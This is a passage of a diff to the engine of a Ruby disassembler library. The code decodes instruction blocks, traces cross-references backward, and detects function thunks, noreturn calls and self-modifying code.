- end - - def do_disassemble_fast_deep(ep) - disassemble_fast(ep) { |fa, di| - fa = normalize(fa) - do_disassemble_fast_deep(fa) - if di and ndi = di_at(fa) - ndi.block.add_from_normal(di.address) - end - } - end - - # disassembles fast from a list of entrypoints - # see disassemble_fast_step - def disassemble_fast(entrypoint, maxdepth=-1, &b) - ep = [entrypoint] - until ep.empty? - disassemble_fast_step(ep, &b) - maxdepth -= 1 - ep.delete_if { |a| not @decoded[normalize(a[0])] } if maxdepth == 0 - end - check_noreturn_function(entrypoint) - end - - # disassembles one block from the ary, see disassemble_fast_block - def disassemble_fast_step(todo, &b) - return if not x = todo.pop - addr, from, from_subfuncret = x - - addr = normalize(addr) - - if di = @decoded[addr] - if di.kind_of? DecodedInstruction - split_block(di.block, di.address) if not di.block_head? - di.block.add_from(from, from_subfuncret ? :subfuncret : :normal) if from and from != :default - end - elsif s = get_section_at(addr) - block = InstructionBlock.new(normalize(addr), s[0]) - block.add_from(from, from_subfuncret ? :subfuncret : :normal) if from and from != :default - todo.concat disassemble_fast_block(block, &b) - elsif name = Expression[addr].reduce_rec and name.kind_of? ::String and not @function[addr] - if c_parser and s = c_parser.toplevel.symbol[name] and s.type.untypedef.kind_of? C::Function - @function[addr] = @cpu.decode_c_function_prototype(@c_parser, s) - detect_function_thunk_noreturn(from) if @function[addr].noreturn - elsif @function[:default] - @function[addr] = @function[:default].dup - end - end - - disassemble_fast_checkfunc(addr) - end - - # check if an addr has an xref :x from a :saveip, if so mark as Function - def disassemble_fast_checkfunc(addr) - if @decoded[addr].kind_of? DecodedInstruction and not @function[addr] - func = false - each_xref(addr, :x) { |x_| - func = true if odi = di_at(x_.origin) and odi.opcode.props[:saveip] - } - if func - auto_label_at(addr, 'sub', 'loc', 'xref') - # XXX use default_btbind_callback ? - @function[addr] = DecodedFunction.new - @function[addr].finalized = true - detect_function_thunk(addr) - puts "found new function #{get_label_at(addr)} at #{Expression[addr]}" if $VERBOSE - end - end - end - - # disassembles fast a new instruction block at block.address (must be normalized) - # does not recurse into subfunctions - # assumes all :saveip returns, except those pointing to a subfunc with noreturn - # yields subfunction addresses (targets of :saveip) - # only backtrace for :x with maxdepth 1 (ie handles only basic push+ret) - # returns a todo-style ary - # assumes @addrs_todo is empty - def disassemble_fast_block(block, &b) - block = InstructionBlock.new(normalize(block), get_section_at(block)[0]) if not block.kind_of? InstructionBlock - di_addr = block.address - delay_slot = nil - di = nil - ret = [] - - return ret if @decoded[di_addr] - - @disassemble_maxblocklength.times { - break if @decoded[di_addr] - - # decode instruction - block.edata.ptr = di_addr - block.address + block.edata_ptr - if not di = @cpu.decode_instruction(block.edata, di_addr) - return ret - end - - @decoded[di_addr] = di - block.add_di di - puts di if $DEBUG - - di = @callback_newinstr[di] if callback_newinstr - return ret if not di - - di_addr = di.next_addr - - if di.opcode.props[:stopexec] or di.opcode.props[:setip] - if di.opcode.props[:setip] - @addrs_todo = [] - @program.get_xrefs_x(self, di).each { |expr| - backtrace(expr, di.address, :origin => di.address, :type => :x, :maxdepth => @backtrace_maxblocks_fast) - } - end - if di.opcode.props[:saveip] - @addrs_todo = [] - ret.concat disassemble_fast_block_subfunc(di, &b) - else - ret.concat @addrs_todo - @addrs_todo = [] - end - delay_slot ||= [di, @cpu.delay_slot(di)] - end - - if delay_slot - if delay_slot[1] <= 0 - return ret if delay_slot[0].opcode.props[:stopexec] - break - end - delay_slot[1] -= 1 - end - } - - di.block.add_to_normal(di_addr) - ret << [di_addr, di.address] - end - - # handles when disassemble_fast encounters a call to a subfunction - def disassemble_fast_block_subfunc(di) - funcs = di.block.to_normal.to_a - do_ret = funcs.empty? - ret = [] - na = di.next_addr + di.bin_length * @cpu.delay_slot(di) - funcs.each { |fa| - fa = normalize(fa) - disassemble_fast_checkfunc(fa) - yield fa, di if block_given? - if f = @function[fa] and bf = f.get_backtracked_for(self, fa, di.address) and not bf.empty? - # this includes retaddr unless f is noreturn - bf.each { |btt| - next if btt.type != :x - bt = backtrace(btt.expr, di.address, :include_start => true, :origin => btt.origin, :maxdepth => [@backtrace_maxblocks_fast, 1].max) - if btt.detached - ret.concat bt # callback argument - elsif bt.find { |a| normalize(a) == na } - do_ret = true - end - } - elsif not f or not f.noreturn - do_ret = true - end - } - if do_ret - di.block.add_to_subfuncret(na) - ret << [na, di.address, true] - di.block.add_to_normal :default if not di.block.to_normal and @function[:default] - end - ret - end - - # trace whose xrefs this di is responsible of - def backtrace_xrefs_di_rw(di) - get_xrefs_rw(di).each { |type, ptr, len| - backtrace(ptr, di.address, :origin => di.address, :type => type, :len => len).each { |xaddr| - next if xaddr == Expression::Unknown - if @check_smc and type == :w - #len.times { |off| # check unaligned ? - waddr = xaddr #+ off - if wdi = di_at(waddr) - puts "W: disasm: #{di} overwrites #{wdi}" if $VERBOSE - wdi.add_comment "overwritten by #{di}" - end - #} - end - } - } - end - - # trace xrefs for execution - def backtrace_xrefs_di_x(di) - ar = @program.get_xrefs_x(self, di) - ar = @callback_newaddr[di.address, ar] || ar if callback_newaddr - ar.each { |expr| backtrace(expr, di.address, :origin => di.address, :type => :x) } - end - - # checks if the function starting at funcaddr is an external function thunk (eg jmp [SomeExtFunc]) - # the argument must be the address of a decodedinstruction that is the first of a function, - # which must not have return_addresses - # returns the new thunk name if it was changed - def detect_function_thunk(funcaddr) - # check thunk linearity (no conditionnal branch etc) - addr = funcaddr - count = 0 - while b = block_at(addr) - count += 1 - return if count > 5 or b.list.length > 4 - if b.to_subfuncret and not b.to_subfuncret.empty? - return if b.to_subfuncret.length != 1 - addr = normalize(b.to_subfuncret.first) - return if not b.to_normal or b.to_normal.length != 1 - # check that the subfunction is simple (eg get_eip) - return if not sf = @function[normalize(b.to_normal.first)] - return if not btb = sf.backtrace_binding - btb = btb.dup - btb.delete_if { |k, v| Expression[k] == Expression[v] } - return if btb.length > 2 or btb.values.include? Expression::Unknown - else - return if not bt = b.to_normal - if bt.include? :default - addr = :default - break - elsif bt.length != 1 - return - end - addr = normalize(bt.first) - end - end - fname = Expression[addr].reduce_rec - if funcaddr != addr and f = @function[funcaddr] - # forward get_backtrace_binding to target - f.backtrace_binding = { :thunk => addr } - f.noreturn = true if @function[addr] and @function[addr].noreturn - end - return if not fname.kind_of? ::String - l = auto_label_at(funcaddr, 'sub', 'loc') - return if l[0, 4] != 'sub_' - puts "found thunk for #{fname} at #{Expression[funcaddr]}" if $DEBUG - rename_label(l, @program.new_label("thunk_#{fname}")) - end - - # this is called when reaching a noreturn function call, with the call address - # it is responsible for detecting the actual 'call' instruction leading to this - # noreturn function, and eventually mark the call target as a thunk - def detect_function_thunk_noreturn(addr) - 5.times { - return if not di = di_at(addr) - if di.opcode.props[:saveip] and not di.block.to_subfuncret - if di.block.to_normal.to_a.length == 1 - taddr = normalize(di.block.to_normal.first) - if di_at(taddr) - @function[taddr] ||= DecodedFunction.new - return detect_function_thunk(taddr) - end - end - break - else - from = di.block.from_normal.to_a + di.block.from_subfuncret.to_a - if from.length == 1 - addr = from.first - else break - end - end - } - end - - # given an address, detect if it may be a noreturn fuction - # it is if all its end blocks are calls to noreturn functions - # if it is, create a @function[fa] with noreturn = true - # should only be called with fa = target of a call - def check_noreturn_function(fa) - fb = function_blocks(fa, false, false) - lasts = fb.keys.find_all { |k| fb[k] == [] } - return if lasts.empty? - if lasts.all? { |la| - b = block_at(la) - next if not di = b.list.last - (di.opcode.props[:saveip] and b.to_normal.to_a.all? { |tfa| - tf = function_at(tfa) and tf.noreturn - }) or (di.opcode.props[:stopexec] and not di.opcode.props[:setip]) - } - # yay - @function[fa] ||= DecodedFunction.new - @function[fa].noreturn = true - end - end - - - # walks the backtrace tree from an address, passing along an object - # - # the steps are (1st = event, followed by hash keys) - # - # for each decoded instruction encountered: - # :di :di - # - # when backtracking to a block through a decodedfunction: - # (yield for each of the block's subfunctions) - # (the decodedinstruction responsible for the call will be yield next) - # :func :func, :funcaddr, :addr, :depth - # - # when jumping from one block to another (excluding :loop): # XXX include :loops ? - # :up :from, :to, :sfret - # - # when the backtrack has nothing to backtrack to (eg program entrypoint): - # :end :addr - # - # when the backtrack stops by taking too long to complete: - # :maxdepth :addr - # - # when the backtrack stops for encountering the specified stop address: - # :stopaddr :addr - # - # when rebacktracking a block already seen in the current branch: - # (looptrace is an array of [obj, block end addr, from_subfuncret], from oldest to newest) - # :loop :looptrace - # - # when the address does not match a known instruction/function: - # :unknown_addr :addr - # - # the block return value is used as follow for :di, :func, :up and :loop: - # false => the backtrace stops for the branch - # nil => the backtrace continues with the current object - # anything else => the backtrace continues with this object - # - # method arguments: - # obj is the initial value of the object - # addr is the address where the backtrace starts - # include_start is a bool specifying if the backtrace should start at addr or just before - # from_subfuncret is a bool specifying if addr points to a decodedinstruction that calls a subfunction - # stopaddr is an [array of] address of instruction, the backtrace will stop just after executing it - # maxdepth is the maximum depth (in blocks) for each backtrace branch. - # (defaults to dasm.backtrace_maxblocks, which defaults do Dasm.backtrace_maxblocks) - def backtrace_walk(obj, addr, include_start, from_subfuncret, stopaddr, maxdepth) - start_addr = normalize(addr) - stopaddr = [stopaddr] if stopaddr and not stopaddr.kind_of? ::Array - - # array of [obj, addr, from_subfuncret, loopdetect] - # loopdetect is an array of [obj, addr, from_type] of each end of block encountered - todo = [] - - # array of [obj, blockaddr] - # avoids rewalking the same value - done = [] - - # updates todo with the addresses to backtrace next - walk_up = lambda { |w_obj, w_addr, w_loopdetect| - if w_loopdetect.length > maxdepth - yield :maxdepth, w_obj, :addr => w_addr, :loopdetect => w_loopdetect - elsif stopaddr and stopaddr.include?(w_addr) - yield :stopaddr, w_obj, :addr => w_addr, :loopdetect => w_loopdetect - elsif w_di = @decoded[w_addr] and w_di != w_di.block.list.first and w_di.address != w_di.block.address - prevdi = w_di.block.list[w_di.block.list.index(w_di)-1] - todo << [w_obj, prevdi.address, :normal, w_loopdetect] - elsif w_di - next if done.include? [w_obj, w_addr] - done << [w_obj, w_addr] - hadsomething = false - w_di.block.each_from { |f_addr, f_type| - next if f_type == :indirect - hadsomething = true - o_f_addr = f_addr - f_addr = @decoded[f_addr].block.list.last.address if @decoded[f_addr].kind_of? DecodedInstruction # delay slot - if l = w_loopdetect.find { |l_obj, l_addr, l_type| l_addr == f_addr and l_type == f_type } - f_obj = yield(:loop, w_obj, :looptrace => w_loopdetect[w_loopdetect.index(l)..-1], :loopdetect => w_loopdetect) - if f_obj and f_obj != w_obj # should avoid infinite loops - f_loopdetect = w_loopdetect[0...w_loopdetect.index(l)] - end - else - f_obj = yield(:up, w_obj, :from => w_addr, :to => f_addr, :sfret => f_type, :loopdetect => w_loopdetect, :real_to => o_f_addr) - end - next if f_obj == false - f_obj ||= w_obj - f_loopdetect ||= w_loopdetect - # only count non-trivial paths in loopdetect (ignore linear links) - add_detect = [[f_obj, f_addr, f_type]] - add_detect = [] if @decoded[f_addr].kind_of? DecodedInstruction and tmp = @decoded[f_addr].block and - ((w_di.block.from_subfuncret.to_a == [] and w_di.block.from_normal == [f_addr] and - tmp.to_normal == [w_di.address] and tmp.to_subfuncret.to_a == []) or - (w_di.block.from_subfuncret == [f_addr] and tmp.to_subfuncret == [w_di.address])) - todo << [f_obj, f_addr, f_type, f_loopdetect + add_detect ] - } - yield :end, w_obj, :addr => w_addr, :loopdetect => w_loopdetect if not hadsomething - elsif @function[w_addr] and w_addr != :default and w_addr != Expression::Unknown - next if done.include? [w_obj, w_addr] - oldlen = todo.length - each_xref(w_addr, :x) { |x| - f_addr = x.origin - o_f_addr = f_addr - f_addr = @decoded[f_addr].block.list.last.address if @decoded[f_addr].kind_of? DecodedInstruction # delay slot - if l = w_loopdetect.find { |l_obj, l_addr, l_type| l_addr == w_addr } - f_obj = yield(:loop, w_obj, :looptrace => w_loopdetect[w_loopdetect.index(l)..-1], :loopdetect => w_loopdetect) - if f_obj and f_obj != w_obj - f_loopdetect = w_loopdetect[0...w_loopdetect.index(l)] - end - else - f_obj = yield(:up, w_obj, :from => w_addr, :to => f_addr, :sfret => :normal, :loopdetect => w_loopdetect, :real_to => o_f_addr) - end - next if f_obj == false - f_obj ||= w_obj - f_loopdetect ||= w_loopdetect - todo << [f_obj, f_addr, :normal, f_loopdetect + [[f_obj, f_addr, :normal]] ] - } - yield :end, w_obj, :addr => w_addr, :loopdetect => w_loopdetect if todo.length == oldlen - else - yield :unknown_addr, w_obj, :addr => w_addr, :loopdetect => w_loopdetect - end - } - - if include_start - todo << [obj, start_addr, from_subfuncret ? :subfuncret : :normal, []] - else - walk_up[obj, start_addr, []] - end - - while not todo.empty? - obj, addr, type, loopdetect = todo.pop - di = @decoded[addr] - if di and type == :subfuncret - di.block.each_to_normal { |sf| - next if not f = @function[normalize(sf)] - s_obj = yield(:func, obj, :func => f, :funcaddr => sf, :addr => addr, :loopdetect => loopdetect) - next if s_obj == false - s_obj ||= obj - if l = loopdetect.find { |l_obj, l_addr, l_type| addr == l_addr and l_type == :normal } - l_obj = yield(:loop, s_obj, :looptrace => loopdetect[loopdetect.index(l)..-1], :loopdetect => loopdetect) - if l_obj and l_obj != s_obj - s_loopdetect = loopdetect[0...loopdetect.index(l)] - end - next if l_obj == false - s_obj = l_obj if l_obj - end - s_loopdetect ||= loopdetect - todo << [s_obj, addr, :normal, s_loopdetect + [[s_obj, addr, :normal]] ] - } - elsif di - # XXX should interpolate index if di is not in block.list, but what if the addresses are not Comparable ? - di.block.list[0..(di.block.list.index(di) || -1)].reverse_each { |di_| - di = di_ # XXX not sure.. - if stopaddr and ea = di.next_addr and stopaddr.include?(ea) - yield :stopaddr, obj, :addr => ea, :loopdetect => loopdetect - break - end - ex_obj = obj - obj = yield(:di, obj, :di => di, :loopdetect => loopdetect) - break if obj == false - obj ||= ex_obj - } - walk_up[obj, di.block.address, loopdetect] if obj - elsif @function[addr] and addr != :default and addr != Expression::Unknown - ex_obj = obj - obj = yield(:func, obj, :func => @function[addr], :funcaddr => addr, :addr => addr, :loopdetect => loopdetect) - next if obj == false - obj ||= ex_obj - walk_up[obj, addr, loopdetect] - else - yield :unknown_addr, obj, :addr => addr, :loopdetect => loopdetect - end - end - end - - # holds a backtrace result until a snapshot_addr is encountered - class StoppedExpr - attr_accessor :exprs - def initialize(e) @exprs = e end - end - - - attr_accessor :debug_backtrace - - # backtraces the value of an expression from start_addr - # updates blocks backtracked_for if type is set - # uses backtrace_walk - # all values returned are from backtrace_check_found (which may generate xrefs, labels, addrs to dasm) unless :no_check is specified - # options: - # :include_start => start backtracking including start_addr - # :from_subfuncret => - # :origin => origin to set for xrefs when resolution is successful - # :orig_expr => initial expression - # :type => xref type (:r, :w, :x, :addr) when :x, the results are added to #addrs_todo - # :len => xref len (for :r/:w) - # :snapshot_addr => addr (or array of) where the backtracker should stop - # if a snapshot_addr is given, values found are ignored if continuing the backtrace does not get to it (eg maxdepth/unk_addr/end) - # :maxdepth => maximum number of blocks to backtrace - # :detached => true if backtracking type :x and the result should not have from = origin set in @addrs_todo - # :max_complexity{_data} => maximum complexity of the expression before aborting its backtrace - # :log => Array, will be updated with the backtrace evolution - # :only_upto => backtrace only to update bt_for for current block & previous ending at only_upto - # :no_check => don't use backtrace_check_found (will not backtrace indirection static values) - # :terminals => array of symbols with constant value (stop backtracking if all symbols in the expr are terminals) (only supported with no_check) - def backtrace(expr, start_addr, nargs={}) - include_start = nargs.delete :include_start - from_subfuncret = nargs.delete :from_subfuncret - origin = nargs.delete :origin - origexpr = nargs.delete :orig_expr - type = nargs.delete :type - len = nargs.delete :len - snapshot_addr = nargs.delete(:snapshot_addr) || nargs.delete(:stopaddr) - maxdepth = nargs.delete(:maxdepth) || @backtrace_maxblocks - detached = nargs.delete :detached - max_complexity = nargs.delete(:max_complexity) || @backtrace_maxcomplexity - max_complexity_data = nargs.delete(:max_complexity) || @backtrace_maxcomplexity_data - bt_log = nargs.delete :log # array to receive the ongoing backtrace info - only_upto = nargs.delete :only_upto - no_check = nargs.delete :no_check - terminals = nargs.delete(:terminals) || [] - raise ArgumentError, "invalid argument to backtrace #{nargs.keys.inspect}" if not nargs.empty? - - expr = Expression[expr] - - origexpr = expr if origin == start_addr - - start_addr = normalize(start_addr) - di = @decoded[start_addr] - - if not snapshot_addr and @cpu.backtrace_is_stack_address(expr) + @cpu.backtrace_update_function_binding(self, subfunc, f, f.return_address) + if not f.return_address + detect_function_thunk(subfunc) + end + } + end + + if di = @decoded[addr] + if di.kind_of? DecodedInstruction + split_block(di.block, di.address) if not di.block_head? # this updates di.block + di.block.add_from(from, from_subfuncret ? :subfuncret : :normal) if from and from != :default + bf = di.block + elsif di == true + bf = @function[addr] + end + elsif bf = @function[addr] + detect_function_thunk_noreturn(from) if bf.noreturn + elsif s = get_section_at(addr) + block = InstructionBlock.new(normalize(addr), s[0]) + block.add_from(from, from_subfuncret ? :subfuncret : :normal) if from and from != :default + disassemble_block(block) + elsif from and c_parser and name = Expression[addr].reduce_rec and name.kind_of? ::String and + s = c_parser.toplevel.symbol[name] and s.type.untypedef.kind_of? C::Function + bf = @function[addr] = @cpu.decode_c_function_prototype(@c_parser, s) + detect_function_thunk_noreturn(from) if bf.noreturn + elsif from + if bf = @function[:default] + puts "using default function for #{Expression[addr]} from #{Expression[from]}" if $DEBUG + if name = Expression[addr].reduce_rec and name.kind_of? ::String + @function[addr] = @function[:default].dup + else + addr = :default + end + if @decoded[from] + @decoded[from].block.add_to addr + end + else + puts "not disassembling unknown address #{Expression[addr]} from #{Expression[from]}" if $DEBUG + end + if from != :default + add_xref(addr, Xref.new(:x, from)) + add_xref(Expression::Unknown, Xref.new(:x, from)) + end + else + puts "not disassembling unknown address #{Expression[addr]}" if $VERBOSE + end + + if bf and from and from != :default + if bf.kind_of? DecodedFunction + bff = bf.get_backtracked_for(self, addr, from) + else + bff = bf.backtracked_for + end + end + bff.each { |btt| + next if btt.address + if @decoded[from].kind_of? DecodedInstruction and @decoded[from].opcode.props[:saveip] and not from_subfuncret and not @function[addr] + backtrace_check_found(btt.expr, @decoded[addr], btt.origin, btt.type, btt.len, btt.maxdepth, btt.detached) + end + next if backtrace_check_funcret(btt, addr, from) + backtrace(btt.expr, from, + :include_start => true, :from_subfuncret => from_subfuncret, + :origin => btt.origin, :orig_expr => btt.orig_expr, :type => btt.type, + :len => btt.len, :detached => btt.detached, :maxdepth => btt.maxdepth) + } if bff + end + + # splits an InstructionBlock, updates the blocks backtracked_for + def split_block(block, address=nil) + if not address # invoked as split_block(0x401012) + return if not @decoded[block].kind_of? DecodedInstruction + block, address = @decoded[block].block, block + end + return block if address == block.address + new_b = block.split address + new_b.backtracked_for.dup.each { |btt| + backtrace(btt.expr, btt.address, + :only_upto => block.list.last.address, + :include_start => !btt.exclude_instr, :from_subfuncret => btt.from_subfuncret, + :origin => btt.origin, :orig_expr => btt.orig_expr, :type => btt.type, :len => btt.len, + :detached => btt.detached, :maxdepth => btt.maxdepth) + } + new_b + end + + # disassembles a new instruction block at block.address (must be normalized) + def disassemble_block(block) + raise if not block.list.empty? + di_addr = block.address + delay_slot = nil + di = nil + + # try not to run for too long + # loop usage: break if the block continues to the following instruction, else return + @disassemble_maxblocklength.times { + # check collision into a known block + break if @decoded[di_addr] + + # check self-modifying code + if @check_smc + #(-7...di.bin_length).each { |off| # uncomment to check for unaligned rewrites + waddr = di_addr #di_addr + off + each_xref(waddr, :w) { |x| + #next if off + x.len < 0 + puts "W: disasm: self-modifying code at #{Expression[waddr]}" if $VERBOSE + @comment[di_addr] ||= [] + @comment[di_addr] |= ["overwritten by #{@decoded[x.origin]}"] + @callback_selfmodifying[di_addr] if callback_selfmodifying + return + } + #} + end + + # decode instruction + block.edata.ptr = di_addr - block.address + block.edata_ptr + if not di = @cpu.decode_instruction(block.edata, di_addr) + ed = block.edata + puts "#{ed.ptr >= ed.length ? "end of section reached" : "unknown instruction #{ed.data[di_addr-block.address+block.edata_ptr, 4].to_s.unpack('H*')}"} at #{Expression[di_addr]}" if $VERBOSE + return + end + + @decoded[di_addr] = di + block.add_di di + puts di if $DEBUG + + di = @callback_newinstr[di] if callback_newinstr + return if not di + block = di.block + + di_addr = di.next_addr + + backtrace_xrefs_di_rw(di) + + if not di_addr or di.opcode.props[:stopexec] or not @program.get_xrefs_x(self, di).empty? + # do not backtrace until delay slot is finished (eg MIPS: di is a + # ret and the delay slot holds stack fixup needed to calc func_binding) + # XXX if the delay slot is also xref_x or :stopexec it is ignored + delay_slot ||= [di, @cpu.delay_slot(di)] + end + + if delay_slot + di, delay = delay_slot + if delay == 0 or not di_addr + backtrace_xrefs_di_x(di) + if di.opcode.props[:stopexec] or not di_addr; return + else break + end + end + delay_slot[1] = delay - 1 + end + } + + ar = [di_addr] + ar = @callback_newaddr[block.list.last.address, ar] || ar if callback_newaddr + ar.each { |di_addr_| backtrace(di_addr_, di.address, :origin => di.address, :type => :x) } + + block + end + + # retrieve the list of execution crossrefs due to the decodedinstruction + # returns a list of symbolic expressions + def get_xrefs_x(di) + @program.get_xrefs_x(self, di) + end + + # retrieve the list of data r/w crossrefs due to the decodedinstruction + # returns a list of [type, symbolic expression, length] + def get_xrefs_rw(di) + @program.get_xrefs_rw(self, di) + end + + # disassembles_fast from a list of entrypoints, also dasm subfunctions + def disassemble_fast_deep(*entrypoints) + @entrypoints ||= [] + @entrypoints |= entrypoints + + entrypoints.each { |ep| do_disassemble_fast_deep(normalize(ep)) } + end + + def do_disassemble_fast_deep(ep) + disassemble_fast(ep) { |fa, di| + fa = normalize(fa) + do_disassemble_fast_deep(fa) + if di and ndi = di_at(fa) + ndi.block.add_from_normal(di.address) + end + } + end + + # disassembles fast from a list of entrypoints + # see disassemble_fast_step + def disassemble_fast(entrypoint, maxdepth=-1, &b) + ep = [entrypoint] + until ep.empty? + disassemble_fast_step(ep, &b) + maxdepth -= 1 + ep.delete_if { |a| not @decoded[normalize(a[0])] } if maxdepth == 0 + end + check_noreturn_function(entrypoint) + end + + # disassembles one block from the ary, see disassemble_fast_block + def disassemble_fast_step(todo, &b) + return if not x = todo.pop + addr, from, from_subfuncret = x + + addr = normalize(addr) + + if di = @decoded[addr] + if di.kind_of? DecodedInstruction + split_block(di.block, di.address) if not di.block_head? + di.block.add_from(from, from_subfuncret ? :subfuncret : :normal) if from and from != :default + end + elsif s = get_section_at(addr) + block = InstructionBlock.new(normalize(addr), s[0]) + block.add_from(from, from_subfuncret ? :subfuncret : :normal) if from and from != :default + todo.concat disassemble_fast_block(block, &b) + elsif name = Expression[addr].reduce_rec and name.kind_of? ::String and not @function[addr] + if c_parser and s = c_parser.toplevel.symbol[name] and s.type.untypedef.kind_of? C::Function + @function[addr] = @cpu.decode_c_function_prototype(@c_parser, s) + detect_function_thunk_noreturn(from) if @function[addr].noreturn + elsif @function[:default] + @function[addr] = @function[:default].dup + end + end + + disassemble_fast_checkfunc(addr) + end + + # check if an addr has an xref :x from a :saveip, if so mark as Function + def disassemble_fast_checkfunc(addr) + if @decoded[addr].kind_of? DecodedInstruction and not @function[addr] + func = false + each_xref(addr, :x) { |x_| + func = true if odi = di_at(x_.origin) and odi.opcode.props[:saveip] + } + if func + auto_label_at(addr, 'sub', 'loc', 'xref') + # XXX use default_btbind_callback ? + @function[addr] = DecodedFunction.new + @function[addr].finalized = true + detect_function_thunk(addr) + puts "found new function #{get_label_at(addr)} at #{Expression[addr]}" if $VERBOSE + end + end + end + + # disassembles fast a new instruction block at block.address (must be normalized) + # does not recurse into subfunctions + # assumes all :saveip returns, except those pointing to a subfunc with noreturn + # yields subfunction addresses (targets of :saveip) + # only backtrace for :x with maxdepth 1 (ie handles only basic push+ret) + # returns a todo-style ary + # assumes @addrs_todo is empty + def disassemble_fast_block(block, &b) + block = InstructionBlock.new(normalize(block), get_section_at(block)[0]) if not block.kind_of? InstructionBlock + di_addr = block.address + delay_slot = nil + di = nil + ret = [] + + return ret if @decoded[di_addr] + + @disassemble_maxblocklength.times { + break if @decoded[di_addr] + + # decode instruction + block.edata.ptr = di_addr - block.address + block.edata_ptr + if not di = @cpu.decode_instruction(block.edata, di_addr) + return ret + end + + @decoded[di_addr] = di + block.add_di di + puts di if $DEBUG + + di = @callback_newinstr[di] if callback_newinstr + return ret if not di + + di_addr = di.next_addr + + if di.opcode.props[:stopexec] or di.opcode.props[:setip] + if di.opcode.props[:setip] + @addrs_todo = [] + @program.get_xrefs_x(self, di).each { |expr| + backtrace(expr, di.address, :origin => di.address, :type => :x, :maxdepth => @backtrace_maxblocks_fast) + } + end + if di.opcode.props[:saveip] + @addrs_todo = [] + ret.concat disassemble_fast_block_subfunc(di, &b) + else + ret.concat @addrs_todo + @addrs_todo = [] + end + delay_slot ||= [di, @cpu.delay_slot(di)] + end + + if delay_slot + if delay_slot[1] <= 0 + return ret if delay_slot[0].opcode.props[:stopexec] + break + end + delay_slot[1] -= 1 + end + } + + di.block.add_to_normal(di_addr) + ret << [di_addr, di.address] + end + + # handles when disassemble_fast encounters a call to a subfunction + def disassemble_fast_block_subfunc(di) + funcs = di.block.to_normal.to_a + do_ret = funcs.empty? + ret = [] + na = di.next_addr + di.bin_length * @cpu.delay_slot(di) + funcs.each { |fa| + fa = normalize(fa) + disassemble_fast_checkfunc(fa) + yield fa, di if block_given? + if f = @function[fa] and bf = f.get_backtracked_for(self, fa, di.address) and not bf.empty? + # this includes retaddr unless f is noreturn + bf.each { |btt| + next if btt.type != :x + bt = backtrace(btt.expr, di.address, :include_start => true, :origin => btt.origin, :maxdepth => [@backtrace_maxblocks_fast, 1].max) + if btt.detached + ret.concat bt # callback argument + elsif bt.find { |a| normalize(a) == na } + do_ret = true + end + } + elsif not f or not f.noreturn + do_ret = true + end + } + if do_ret + di.block.add_to_subfuncret(na) + ret << [na, di.address, true] + di.block.add_to_normal :default if not di.block.to_normal and @function[:default] + end + ret + end + + # trace whose xrefs this di is responsible of + def backtrace_xrefs_di_rw(di) + get_xrefs_rw(di).each { |type, ptr, len| + backtrace(ptr, di.address, :origin => di.address, :type => type, :len => len).each { |xaddr| + next if xaddr == Expression::Unknown + if @check_smc and type == :w + #len.times { |off| # check unaligned ? + waddr = xaddr #+ off + if wdi = di_at(waddr) + puts "W: disasm: #{di} overwrites #{wdi}" if $VERBOSE + wdi.add_comment "overwritten by #{di}" + end + #} + end + } + } + end + + # trace xrefs for execution + def backtrace_xrefs_di_x(di) + ar = @program.get_xrefs_x(self, di) + ar = @callback_newaddr[di.address, ar] || ar if callback_newaddr + ar.each { |expr| backtrace(expr, di.address, :origin => di.address, :type => :x) } + end + + # checks if the function starting at funcaddr is an external function thunk (eg jmp [SomeExtFunc]) + # the argument must be the address of a decodedinstruction that is the first of a function, + # which must not have return_addresses + # returns the new thunk name if it was changed + def detect_function_thunk(funcaddr) + # check thunk linearity (no conditionnal branch etc) + addr = funcaddr + count = 0 + while b = block_at(addr) + count += 1 + return if count > 5 or b.list.length > 4 + if b.to_subfuncret and not b.to_subfuncret.empty? + return if b.to_subfuncret.length != 1 + addr = normalize(b.to_subfuncret.first) + return if not b.to_normal or b.to_normal.length != 1 + # check that the subfunction is simple (eg get_eip) + return if not sf = @function[normalize(b.to_normal.first)] + return if not btb = sf.backtrace_binding + btb = btb.dup + btb.delete_if { |k, v| Expression[k] == Expression[v] } + return if btb.length > 2 or btb.values.include? Expression::Unknown + else + return if not bt = b.to_normal + if bt.include? :default + addr = :default + break + elsif bt.length != 1 + return + end + addr = normalize(bt.first) + end + end + fname = Expression[addr].reduce_rec + if funcaddr != addr and f = @function[funcaddr] + # forward get_backtrace_binding to target + f.backtrace_binding = { :thunk => addr } + f.noreturn = true if @function[addr] and @function[addr].noreturn + end + return if not fname.kind_of? ::String + l = auto_label_at(funcaddr, 'sub', 'loc') + return if l[0, 4] != 'sub_' + puts "found thunk for #{fname} at #{Expression[funcaddr]}" if $DEBUG + rename_label(l, @program.new_label("thunk_#{fname}")) + end + + # this is called when reaching a noreturn function call, with the call address + # it is responsible for detecting the actual 'call' instruction leading to this + # noreturn function, and eventually mark the call target as a thunk + def detect_function_thunk_noreturn(addr) + 5.times { + return if not di = di_at(addr) + if di.opcode.props[:saveip] and not di.block.to_subfuncret + if di.block.to_normal.to_a.length == 1 + taddr = normalize(di.block.to_normal.first) + if di_at(taddr) + @function[taddr] ||= DecodedFunction.new + return detect_function_thunk(taddr) + end + end + break + else + from = di.block.from_normal.to_a + di.block.from_subfuncret.to_a + if from.length == 1 + addr = from.first + else break + end + end + } + end + + # given an address, detect if it may be a noreturn fuction + # it is if all its end blocks are calls to noreturn functions + # if it is, create a @function[fa] with noreturn = true + # should only be called with fa = target of a call + def check_noreturn_function(fa) + fb = function_blocks(fa, false, false) + lasts = fb.keys.find_all { |k| fb[k] == [] } + return if lasts.empty? + if lasts.all? { |la| + b = block_at(la) + next if not di = b.list.last + (di.opcode.props[:saveip] and b.to_normal.to_a.all? { |tfa| + tf = function_at(tfa) and tf.noreturn + }) or (di.opcode.props[:stopexec] and not di.opcode.props[:setip]) + } + # yay + @function[fa] ||= DecodedFunction.new + @function[fa].noreturn = true + end + end + + + # walks the backtrace tree from an address, passing along an object + # + # the steps are (1st = event, followed by hash keys) + # + # for each decoded instruction encountered: + # :di :di + # + # when backtracking to a block through a decodedfunction: + # (yield for each of the block's subfunctions) + # (the decodedinstruction responsible for the call will be yield next) + # :func :func, :funcaddr, :addr, :depth + # + # when jumping from one block to another (excluding :loop): # XXX include :loops ? + # :up :from, :to, :sfret + # + # when the backtrack has nothing to backtrack to (eg program entrypoint): + # :end :addr + # + # when the backtrack stops by taking too long to complete: + # :maxdepth :addr + # + # when the backtrack stops for encountering the specified stop address: + # :stopaddr :addr + # + # when rebacktracking a block already seen in the current branch: + # (looptrace is an array of [obj, block end addr, from_subfuncret], from oldest to newest) + # :loop :looptrace + # 